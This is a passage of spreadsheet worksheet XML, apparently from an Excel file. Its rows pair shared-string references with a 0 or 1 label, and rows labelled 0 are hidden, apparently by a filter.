      <c r="D1015" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1016" hidden="1">
      <c r="A1016" s="1">
        <v>1014.0</v>
      </c>
      <c r="B1016" s="1" t="s">
        <v>1816</v>
      </c>
      <c r="C1016" s="1" t="s">
        <v>1817</v>
      </c>
      <c r="D1016" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1017" hidden="1">
      <c r="A1017" s="1">
        <v>1015.0</v>
      </c>
      <c r="B1017" s="1" t="s">
        <v>1008</v>
      </c>
      <c r="C1017" s="1" t="s">
        <v>1818</v>
      </c>
      <c r="D1017" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1018" hidden="1">
      <c r="A1018" s="1">
        <v>1016.0</v>
      </c>
      <c r="B1018" s="1" t="s">
        <v>1819</v>
      </c>
      <c r="C1018" s="1" t="s">
        <v>1820</v>
      </c>
      <c r="D1018" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1019">
      <c r="A1019" s="1">
        <v>1017.0</v>
      </c>
      <c r="B1019" s="1" t="s">
        <v>1821</v>
      </c>
      <c r="C1019" s="1" t="s">
        <v>1822</v>
      </c>
      <c r="D1019" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1020" hidden="1">
      <c r="A1020" s="1">
        <v>1018.0</v>
      </c>
      <c r="B1020" s="1" t="s">
        <v>1823</v>
      </c>
      <c r="C1020" s="1" t="s">
        <v>1824</v>
      </c>
      <c r="D1020" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1021" hidden="1">
      <c r="A1021" s="1">
        <v>1019.0</v>
      </c>
      <c r="B1021" s="1" t="s">
        <v>1825</v>
      </c>
      <c r="C1021" s="1" t="s">
        <v>1826</v>
      </c>
      <c r="D1021" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1022" hidden="1">
      <c r="A1022" s="1">
        <v>1020.0</v>
      </c>
      <c r="B1022" s="1" t="s">
        <v>1827</v>
      </c>
      <c r="C1022" s="1" t="s">
        <v>1828</v>
      </c>
      <c r="D1022" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1023" hidden="1">
      <c r="A1023" s="1">
        <v>1021.0</v>
      </c>
      <c r="B1023" s="1" t="s">
        <v>136</v>
      </c>
      <c r="C1023" s="1" t="s">
        <v>137</v>
      </c>
      <c r="D1023" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1024" hidden="1">
      <c r="A1024" s="1">
        <v>1022.0</v>
      </c>
      <c r="B1024" s="1" t="s">
        <v>1829</v>
      </c>
      <c r="C1024" s="1" t="s">
        <v>1830</v>
      </c>
      <c r="D1024" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1025" hidden="1">
      <c r="A1025" s="1">
        <v>1023.0</v>
      </c>
      <c r="B1025" s="1" t="s">
        <v>1831</v>
      </c>
      <c r="C1025" s="1" t="s">
        <v>1832</v>
      </c>
      <c r="D1025" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1026">
      <c r="A1026" s="1">
        <v>1024.0</v>
      </c>
      <c r="B1026" s="1" t="s">
        <v>1833</v>
      </c>
      <c r="C1026" s="1" t="s">
        <v>1834</v>
      </c>
      <c r="D1026" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1027" hidden="1">
      <c r="A1027" s="1">
        <v>1025.0</v>
      </c>
      <c r="B1027" s="1" t="s">
        <v>825</v>
      </c>
      <c r="C1027" s="1" t="s">
        <v>826</v>
      </c>
      <c r="D1027" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="1">
        <v>1026.0</v>
      </c>
      <c r="B1028" s="1" t="s">
        <v>1835</v>
      </c>
      <c r="C1028" s="1" t="s">
        <v>1836</v>
      </c>
      <c r="D1028" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1029" hidden="1">
      <c r="A1029" s="1">
        <v>1027.0</v>
      </c>
      <c r="B1029" s="1" t="s">
        <v>1116</v>
      </c>
      <c r="C1029" s="1" t="s">
        <v>1837</v>
      </c>
      <c r="D1029" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="1">
        <v>1028.0</v>
      </c>
      <c r="B1030" s="1" t="s">
        <v>1838</v>
      </c>
      <c r="C1030" s="1" t="s">
        <v>1839</v>
      </c>
      <c r="D1030" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1031" hidden="1">
      <c r="A1031" s="1">
        <v>1029.0</v>
      </c>
      <c r="B1031" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C1031" s="1" t="s">
        <v>1840</v>
      </c>
      <c r="D1031" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1032" hidden="1">
      <c r="A1032" s="1">
        <v>1030.0</v>
      </c>
      <c r="B1032" s="1" t="s">
        <v>1841</v>
      </c>
      <c r="C1032" s="1" t="s">
        <v>1842</v>
      </c>
      <c r="D1032" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1033" hidden="1">
      <c r="A1033" s="1">
        <v>1031.0</v>
      </c>
      <c r="B1033" s="1" t="s">
        <v>347</v>
      </c>
      <c r="C1033" s="1" t="s">
        <v>1843</v>
      </c>
      <c r="D1033" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1034" hidden="1">
      <c r="A1034" s="1">
        <v>1032.0</v>
      </c>
      <c r="B1034" s="1" t="s">
        <v>1844</v>
      </c>
      <c r="C1034" s="1" t="s">
        <v>1845</v>
      </c>
      <c r="D1034" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1035" hidden="1">
      <c r="A1035" s="1">
        <v>1033.0</v>
      </c>
      <c r="B1035" s="1" t="s">
        <v>1846</v>
      </c>
      <c r="C1035" s="1" t="s">
        <v>1847</v>
      </c>
      <c r="D1035" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1036" hidden="1">
      <c r="A1036" s="1">
        <v>1034.0</v>
      </c>
      <c r="B1036" s="1" t="s">
        <v>1848</v>
      </c>
      <c r="C1036" s="1" t="s">
        <v>1849</v>
      </c>
      <c r="D1036" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1037" hidden="1">
      <c r="A1037" s="1">
        <v>1035.0</v>
      </c>
      <c r="B1037" s="1" t="s">
        <v>1850</v>
      </c>
      <c r="C1037" s="1" t="s">
        <v>1851</v>
      </c>
      <c r="D1037" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1038" hidden="1">
      <c r="A1038" s="1">
        <v>1036.0</v>
      </c>
      <c r="B1038" s="1" t="s">
        <v>1852</v>
      </c>
      <c r="C1038" s="1" t="s">
        <v>1853</v>
      </c>
      <c r="D1038" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="1">
        <v>1037.0</v>
      </c>
      <c r="B1039" s="1" t="s">
        <v>1854</v>
      </c>
      <c r="C1039" s="1" t="s">
        <v>1855</v>
      </c>
      <c r="D1039" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="1">
        <v>1038.0</v>
      </c>
      <c r="B1040" s="1" t="s">
        <v>1225</v>
      </c>
      <c r="C1040" s="1" t="s">
        <v>1226</v>
      </c>
      <c r="D1040" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="1">
        <v>1039.0</v>
      </c>
      <c r="B1041" s="1" t="s">
        <v>1856</v>
      </c>
      <c r="C1041" s="1" t="s">
        <v>1857</v>
      </c>
      <c r="D1041" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1042" hidden="1">
      <c r="A1042" s="1">
        <v>1040.0</v>
      </c>
      <c r="B1042" s="1" t="s">
        <v>1858</v>
      </c>
      <c r="C1042" s="1" t="s">
        <v>1859</v>
      </c>
      <c r="D1042" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="1">
        <v>1041.0</v>
      </c>
      <c r="B1043" s="1" t="s">
        <v>1860</v>
      </c>
      <c r="C1043" s="1" t="s">
        <v>1861</v>
      </c>
      <c r="D1043" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1044" hidden="1">
      <c r="A1044" s="1">
        <v>1042.0</v>
      </c>
      <c r="B1044" s="1" t="s">
        <v>1862</v>
      </c>
      <c r="C1044" s="1" t="s">
        <v>1863</v>
      </c>
      <c r="D1044" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1045" hidden="1">
      <c r="A1045" s="1">
        <v>1043.0</v>
      </c>
      <c r="B1045" s="1" t="s">
        <v>124</v>
      </c>
      <c r="C1045" s="1" t="s">
        <v>1864</v>
      </c>
      <c r="D1045" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1046" hidden="1">
      <c r="A1046" s="1">
        <v>1044.0</v>
      </c>
      <c r="B1046" s="1" t="s">
        <v>582</v>
      </c>
      <c r="C1046" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="D1046" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="1">
        <v>1045.0</v>
      </c>
      <c r="B1047" s="1" t="s">
        <v>1504</v>
      </c>
      <c r="C1047" s="1" t="s">
        <v>1505</v>
      </c>
      <c r="D1047" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1048" hidden="1">
      <c r="A1048" s="1">
        <v>1046.0</v>
      </c>
      <c r="B1048" s="1" t="s">
        <v>1866</v>
      </c>
      <c r="C1048" s="1" t="s">
        <v>1867</v>
      </c>
      <c r="D1048" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1049" hidden="1">
      <c r="A1049" s="1">
        <v>1047.0</v>
      </c>
      <c r="B1049" s="1" t="s">
        <v>1181</v>
      </c>
      <c r="C1049" s="1" t="s">
        <v>1868</v>
      </c>
      <c r="D1049" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1050" hidden="1">
      <c r="A1050" s="1">
        <v>1048.0</v>
      </c>
      <c r="B1050" s="1" t="s">
        <v>1536</v>
      </c>
      <c r="C1050" s="1" t="s">
        <v>1537</v>
      </c>
      <c r="D1050" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1051" hidden="1">
      <c r="A1051" s="1">
        <v>1049.0</v>
      </c>
      <c r="B1051" s="1" t="s">
        <v>563</v>
      </c>
      <c r="C1051" s="1" t="s">
        <v>1437</v>
      </c>
      <c r="D1051" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1052" hidden="1">
      <c r="A1052" s="1">
        <v>1050.0</v>
      </c>
      <c r="B1052" s="1" t="s">
        <v>1027</v>
      </c>
      <c r="C1052" s="1" t="s">
        <v>1869</v>
      </c>
      <c r="D1052" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1053" hidden="1">
      <c r="A1053" s="1">
        <v>1051.0</v>
      </c>
      <c r="B1053" s="1" t="s">
        <v>949</v>
      </c>
      <c r="C1053" s="1" t="s">
        <v>1870</v>
      </c>
      <c r="D1053" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1054" hidden="1">
      <c r="A1054" s="1">
        <v>1052.0</v>
      </c>
      <c r="B1054" s="1" t="s">
        <v>187</v>
      </c>
      <c r="C1054" s="1" t="s">
        <v>1871</v>
      </c>
      <c r="D1054" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1055" hidden="1">
      <c r="A1055" s="1">
        <v>1053.0</v>
      </c>
      <c r="B1055" s="1" t="s">
        <v>1872</v>
      </c>
      <c r="C1055" s="1" t="s">
        <v>1873</v>
      </c>
      <c r="D1055" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="1">
        <v>1054.0</v>
      </c>
      <c r="B1056" s="1" t="s">
        <v>1874</v>
      </c>
      <c r="C1056" s="1" t="s">
        <v>1875</v>
      </c>
      <c r="D1056" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="1">
        <v>1055.0</v>
      </c>
      <c r="B1057" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="C1057" s="1" t="s">
        <v>1877</v>
      </c>
      <c r="D1057" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="1">
        <v>1056.0</v>
      </c>
      <c r="B1058" s="1" t="s">
        <v>1878</v>
      </c>
      <c r="C1058" s="1" t="s">
        <v>1879</v>
      </c>
      <c r="D1058" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="1">
        <v>1057.0</v>
      </c>
      <c r="B1059" s="1" t="s">
        <v>1880</v>
      </c>
      <c r="C1059" s="1" t="s">
        <v>1881</v>
      </c>
      <c r="D1059" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="1">
        <v>1058.0</v>
      </c>
      <c r="B1060" s="1" t="s">
        <v>1882</v>
      </c>
      <c r="C1060" s="1" t="s">
        <v>1883</v>
      </c>
      <c r="D1060" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1061" hidden="1">
      <c r="A1061" s="1">
        <v>1059.0</v>
      </c>
      <c r="B1061" s="1" t="s">
        <v>1884</v>
      </c>
      <c r="C1061" s="1" t="s">
        <v>1885</v>
      </c>
      <c r="D1061" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="1">
        <v>1060.0</v>
      </c>
      <c r="B1062" s="1" t="s">
        <v>1886</v>
      </c>
      <c r="C1062" s="1" t="s">
        <v>1887</v>
      </c>
      <c r="D1062" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="1">
        <v>1061.0</v>
      </c>
      <c r="B1063" s="1" t="s">
        <v>1888</v>
      </c>
      <c r="C1063" s="1" t="s">
        <v>1889</v>
      </c>
      <c r="D1063" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1064" hidden="1">
      <c r="A1064" s="1">
        <v>1062.0</v>
      </c>
      <c r="B1064" s="1" t="s">
        <v>1890</v>
      </c>
      <c r="C1064" s="1" t="s">
        <v>1891</v>
      </c>
      <c r="D1064" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="1">
        <v>1063.0</v>
      </c>
      <c r="B1065" s="1" t="s">
        <v>1892</v>
      </c>
      <c r="C1065" s="1" t="s">
        <v>1893</v>
      </c>
      <c r="D1065" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1066" hidden="1">
      <c r="A1066" s="1">
        <v>1064.0</v>
      </c>
      <c r="B1066" s="1" t="s">
        <v>387</v>
      </c>
      <c r="C1066" s="1" t="s">
        <v>1894</v>
      </c>
      <c r="D1066" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1067" hidden="1">
      <c r="A1067" s="1">
        <v>1065.0</v>
      </c>
      <c r="B1067" s="1" t="s">
        <v>1895</v>
      </c>
      <c r="C1067" s="1" t="s">
        <v>1896</v>
      </c>
      <c r="D1067" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1068" hidden="1">
      <c r="A1068" s="1">
        <v>1066.0</v>
      </c>
      <c r="B1068" s="1" t="s">
        <v>1897</v>
      </c>
      <c r="C1068" s="1" t="s">
        <v>1898</v>
      </c>
      <c r="D1068" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="1">
        <v>1067.0</v>
      </c>
      <c r="B1069" s="1" t="s">
        <v>1899</v>
      </c>
      <c r="C1069" s="1" t="s">
        <v>1900</v>
      </c>
      <c r="D1069" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1070" hidden="1">
      <c r="A1070" s="1">
        <v>1068.0</v>
      </c>
      <c r="B1070" s="1" t="s">
        <v>1901</v>
      </c>
      <c r="C1070" s="1" t="s">
        <v>1902</v>
      </c>
      <c r="D1070" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1071" hidden="1">
      <c r="A1071" s="1">
        <v>1069.0</v>
      </c>
      <c r="B1071" s="1" t="s">
        <v>1903</v>
      </c>
      <c r="C1071" s="1" t="s">
        <v>1904</v>
      </c>
      <c r="D1071" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1072" hidden="1">
      <c r="A1072" s="1">
        <v>1070.0</v>
      </c>
      <c r="B1072" s="1" t="s">
        <v>914</v>
      </c>
      <c r="C1072" s="1" t="s">
        <v>1905</v>
      </c>
      <c r="D1072" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1073" hidden="1">
      <c r="A1073" s="1">
        <v>1071.0</v>
      </c>
      <c r="B1073" s="1" t="s">
        <v>1906</v>
      </c>
      <c r="C1073" s="1" t="s">
        <v>1907</v>
      </c>
      <c r="D1073" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="1">
        <v>1072.0</v>
      </c>
      <c r="B1074" s="1" t="s">
        <v>1908</v>
      </c>
      <c r="C1074" s="1" t="s">
        <v>1909</v>
      </c>
      <c r="D1074" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="1">
        <v>1073.0</v>
      </c>
      <c r="B1075" s="1" t="s">
        <v>1910</v>
      </c>
      <c r="C1075" s="1" t="s">
        <v>1911</v>
      </c>
      <c r="D1075" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1076" hidden="1">
      <c r="A1076" s="1">
        <v>1074.0</v>
      </c>
      <c r="B1076" s="1" t="s">
        <v>1912</v>
      </c>
      <c r="C1076" s="1" t="s">
        <v>1913</v>
      </c>
      <c r="D1076" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1077" hidden="1">
      <c r="A1077" s="1">
        <v>1075.0</v>
      </c>
      <c r="B1077" s="1" t="s">
        <v>1914</v>
      </c>
      <c r="C1077" s="1" t="s">
        <v>1915</v>
      </c>
      <c r="D1077" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1078" hidden="1">
      <c r="A1078" s="1">
        <v>1076.0</v>
      </c>
      <c r="B1078" s="1" t="s">
        <v>1916</v>
      </c>
      <c r="C1078" s="1" t="s">
        <v>1917</v>
      </c>
      <c r="D1078" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1079" hidden="1">
      <c r="A1079" s="1">
        <v>1077.0</v>
      </c>
      <c r="B1079" s="1" t="s">
        <v>1918</v>
      </c>
      <c r="C1079" s="1" t="s">
        <v>1919</v>
      </c>
      <c r="D1079" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1080" hidden="1">
      <c r="A1080" s="1">
        <v>1078.0</v>
      </c>
      <c r="B1080" s="1" t="s">
        <v>470</v>
      </c>
      <c r="C1080" s="1" t="s">
        <v>1920</v>
      </c>
      <c r="D1080" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1081" hidden="1">
      <c r="A1081" s="1">
        <v>1079.0</v>
      </c>
      <c r="B1081" s="1" t="s">
        <v>1921</v>
      </c>
      <c r="C1081" s="1" t="s">
        <v>1922</v>
      </c>
      <c r="D1081" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="1">
        <v>1080.0</v>
      </c>
      <c r="B1082" s="1" t="s">
        <v>1923</v>
      </c>
      <c r="C1082" s="1" t="s">
        <v>1924</v>
      </c>
      <c r="D1082" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1083" hidden="1">
      <c r="A1083" s="1">
        <v>1081.0</v>
      </c>
      <c r="B1083" s="1" t="s">
        <v>1925</v>
      </c>
      <c r="C1083" s="1" t="s">
        <v>1926</v>
      </c>
      <c r="D1083" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="1">
        <v>1082.0</v>
      </c>
      <c r="B1084" s="1" t="s">
        <v>1927</v>
      </c>
      <c r="C1084" s="1" t="s">
        <v>1928</v>
      </c>
      <c r="D1084" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1085" hidden="1">
      <c r="A1085" s="1">
        <v>1083.0</v>
      </c>
      <c r="B1085" s="1" t="s">
        <v>1929</v>
      </c>
      <c r="C1085" s="1" t="s">
        <v>1930</v>
      </c>
      <c r="D1085" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1086" hidden="1">
      <c r="A1086" s="1">
        <v>1084.0</v>
      </c>
      <c r="B1086" s="1" t="s">
        <v>1931</v>
      </c>
      <c r="C1086" s="1" t="s">
        <v>1932</v>
      </c>
      <c r="D1086" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="1">
        <v>1085.0</v>
      </c>
      <c r="B1087" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="C1087" s="1" t="s">
        <v>1933</v>
      </c>
      <c r="D1087" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1088" hidden="1">
      <c r="A1088" s="1">
        <v>1086.0</v>
      </c>
      <c r="B1088" s="1" t="s">
        <v>1934</v>
      </c>
      <c r="C1088" s="1" t="s">
        <v>1935</v>
      </c>
      <c r="D1088" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="1">
        <v>1087.0</v>
      </c>
      <c r="B1089" s="1" t="s">
        <v>1936</v>
      </c>
      <c r="C1089" s="1" t="s">
        <v>1937</v>
      </c>
      <c r="D1089" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1090" hidden="1">
      <c r="A1090" s="1">
        <v>1088.0</v>
      </c>
      <c r="B1090" s="1" t="s">
        <v>957</v>
      </c>
      <c r="C1090" s="1" t="s">
        <v>1938</v>
      </c>
      <c r="D1090" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1091" hidden="1">
      <c r="A1091" s="1">
        <v>1089.0</v>
      </c>
      <c r="B1091" s="1" t="s">
        <v>1939</v>
      </c>
      <c r="C1091" s="1" t="s">
        <v>1940</v>
      </c>
      <c r="D1091" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1092" hidden="1">
      <c r="A1092" s="1">
        <v>1090.0</v>
      </c>
      <c r="B1092" s="1" t="s">
        <v>1941</v>
      </c>
      <c r="C1092" s="1" t="s">
        <v>1942</v>
      </c>
      <c r="D1092" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="1">
        <v>1091.0</v>
      </c>
      <c r="B1093" s="1" t="s">
        <v>1943</v>
      </c>
      <c r="C1093" s="1" t="s">
        <v>1944</v>
      </c>
      <c r="D1093" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1094" hidden="1">
      <c r="A1094" s="1">
        <v>1092.0</v>
      </c>
      <c r="B1094" s="1" t="s">
        <v>1945</v>
      </c>
      <c r="C1094" s="1" t="s">
        <v>1946</v>
      </c>
      <c r="D1094" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1095" hidden="1">
      <c r="A1095" s="1">
        <v>1093.0</v>
      </c>
      <c r="B1095" s="1" t="s">
        <v>1947</v>
      </c>
      <c r="C1095" s="1" t="s">
        <v>1948</v>
      </c>
      <c r="D1095" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="1">
        <v>1094.0</v>
      </c>
      <c r="B1096" s="1" t="s">
        <v>1876</v>
      </c>
      <c r="C1096" s="1" t="s">
        <v>1949</v>
      </c>
      <c r="D1096" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1097" hidden="1">
      <c r="A1097" s="1">
        <v>1095.0</v>
      </c>
      <c r="B1097" s="1" t="s">
        <v>323</v>
      </c>
      <c r="C1097" s="1" t="s">
        <v>1950</v>
      </c>
      <c r="D1097" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="1">
        <v>1096.0</v>
      </c>
      <c r="B1098" s="1" t="s">
        <v>1951</v>
      </c>
      <c r="C1098" s="1" t="s">
        <v>1952</v>
      </c>
      <c r="D1098" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1099" hidden="1">
      <c r="A1099" s="1">
        <v>1097.0</v>
      </c>
      <c r="B1099" s="1" t="s">
        <v>1953</v>
      </c>
      <c r="C1099" s="1" t="s">
        <v>1954</v>
      </c>
      <c r="D1099" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="1">
        <v>1098.0</v>
      </c>
      <c r="B1100" s="1" t="s">
        <v>1955</v>
      </c>
      <c r="C1100" s="1" t="s">
        <v>1956</v>
      </c>
      <c r="D1100" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1101" hidden="1">
      <c r="A1101" s="1">
        <v>1099.0</v>
      </c>
      <c r="B1101" s="1" t="s">
        <v>1957</v>
      </c>
      <c r="C1101" s="1" t="s">
        <v>1958</v>
      </c>
      <c r="D1101" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1102" hidden="1">
      <c r="A1102" s="1">
        <v>1100.0</v>
      </c>
      <c r="B1102" s="1" t="s">
        <v>1959</v>
      </c>
      <c r="C1102" s="1" t="s">
        <v>1960</v>
      </c>
      <c r="D1102" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="1">
        <v>1101.0</v>
      </c>
      <c r="B1103" s="1" t="s">
        <v>1961</v>
      </c>
      <c r="C1103" s="1" t="s">
        <v>1962</v>
      </c>
      <c r="D1103" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1104" hidden="1">
      <c r="A1104" s="1">
        <v>1102.0</v>
      </c>
      <c r="B1104" s="1" t="s">
        <v>1963</v>
      </c>
      <c r="C1104" s="1" t="s">
        <v>1964</v>
      </c>
      <c r="D1104" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="1">
        <v>1103.0</v>
      </c>
      <c r="B1105" s="1" t="s">
        <v>1965</v>
      </c>
      <c r="C1105" s="1" t="s">
        <v>1966</v>
      </c>
      <c r="D1105" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="1">
        <v>1104.0</v>
      </c>
      <c r="B1106" s="1" t="s">
        <v>1967</v>
      </c>
      <c r="C1106" s="1" t="s">
        <v>1968</v>
      </c>
      <c r="D1106" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="1">
        <v>1105.0</v>
      </c>
      <c r="B1107" s="1" t="s">
        <v>1969</v>
      </c>
      <c r="C1107" s="1" t="s">
        <v>1970</v>
      </c>
      <c r="D1107" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1108" hidden="1">
      <c r="A1108" s="1">
        <v>1106.0</v>
      </c>
      <c r="B1108" s="1" t="s">
        <v>1971</v>
      </c>
      <c r="C1108" s="1" t="s">
        <v>1972</v>
      </c>
      <c r="D1108" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1109" hidden="1">
      <c r="A1109" s="1">
        <v>1107.0</v>
      </c>
      <c r="B1109" s="1" t="s">
        <v>1973</v>
      </c>
      <c r="C1109" s="1" t="s">
        <v>1974</v>
      </c>
      <c r="D1109" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1110" hidden="1">
      <c r="A1110" s="1">
        <v>1108.0</v>
      </c>
      <c r="B1110" s="1" t="s">
        <v>338</v>
      </c>
      <c r="C1110" s="1" t="s">
        <v>1367</v>
      </c>
      <c r="D1110" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="1">
        <v>1109.0</v>
      </c>
      <c r="B1111" s="1" t="s">
        <v>1975</v>
      </c>
      <c r="C1111" s="1" t="s">
        <v>1976</v>
      </c>
      <c r="D1111" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1112" hidden="1">
      <c r="A1112" s="1">
        <v>1110.0</v>
      </c>
      <c r="B1112" s="1" t="s">
        <v>1977</v>
      </c>
      <c r="C1112" s="1" t="s">
        <v>1978</v>
      </c>
      <c r="D1112" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1113" hidden="1">
      <c r="A1113" s="1">
        <v>1111.0</v>
      </c>
      <c r="B1113" s="1" t="s">
        <v>1979</v>
      </c>
      <c r="C1113" s="1" t="s">
        <v>1980</v>
      </c>
      <c r="D1113" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1114" hidden="1">
      <c r="A1114" s="1">
        <v>1112.0</v>
      </c>
      <c r="B1114" s="1" t="s">
        <v>251</v>
      </c>
      <c r="C1114" s="1" t="s">
        <v>252</v>
      </c>
      <c r="D1114" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="1">
        <v>1113.0</v>
      </c>
      <c r="B1115" s="1" t="s">
        <v>1981</v>
      </c>
      <c r="C1115" s="1" t="s">
        <v>1982</v>
      </c>
      <c r="D1115" s="1">
        <v>1.0</v>
      </c>
    </row>
    <row r="1116" hidden="1">
      <c r="A1116" s="1">
        <v>1114.0</v>
      </c>
      <c r="B1116" s="1" t="s">
        <v>1983</v>
      </c>
      <c r="C1116" s="1" t="s">
        <v>1984</v>
      </c>
      <c r="D1116" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1117" hidden="1">
      <c r="A1117" s="1">
        <v>1115.0</v>
      </c>
      <c r="B1117" s="1" t="s">
        <v>1985</v>
      </c>
      <c r="C1117" s="1" t="s">
        <v>1986</v>
      </c>
      <c r="D1117" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1118" hidden="1">
      <c r="A1118" s="1">
        <v>1116.0</v>
      </c>
      <c r="B1118" s="1" t="s">
        <v>1987</v>
      </c>
      <c r="C1118" s="1" t="s">
        <v>1988</v>
      </c>
      <c r="D1118" s="1">
        <v>0.0</v>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="1">
        <v>1117.0</v>
      </c>
